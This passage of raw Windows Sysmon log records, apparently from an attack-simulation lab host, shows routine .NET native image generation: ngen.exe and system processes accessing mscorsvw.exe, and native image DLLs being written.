13:46:12.672{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9124-6005-AD01-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:12.531{59A5CD1D-9122-6005-AC01-00000000A301}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11a0-0\Microsoft.Build.Tasks.v4.0.dll2021-01-18 13:46:12.531 10341000x80000000000000005936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.968{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9125-6005-B201-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.953{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9125-6005-B201-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.953{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9125-6005-B201-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.578{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9125-6005-B101-00000000A301}4300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.562{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9125-6005-B101-00000000A301}4300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.562{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9125-6005-B101-00000000A301}4300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.500{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9125-6005-B001-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.484{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9125-6005-B001-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.484{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9125-6005-B001-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9125-6005-AF01-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.390{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9125-6005-AF01-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.390{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9125-6005-AF01-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:13.328{59A5CD1D-9124-6005-AE01-00000000A301}4732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\127c-0\Microsoft.Build.Utilities.v4.0.dll2021-01-18 13:46:13.328 10341000x80000000000000005945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.156{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9126-6005-B501-00000000A301}1128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.140{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9126-6005-B501-00000000A301}1128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.140{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9126-6005-B501-00000000A301}1128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.062{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9126-6005-B401-00000000A301}4924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.062{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9126-6005-B401-00000000A301}4924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.062{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9126-6005-B401-00000000A301}4924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9126-6005-B301-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.000{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9126-6005-B301-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.000{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9126-6005-B301-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 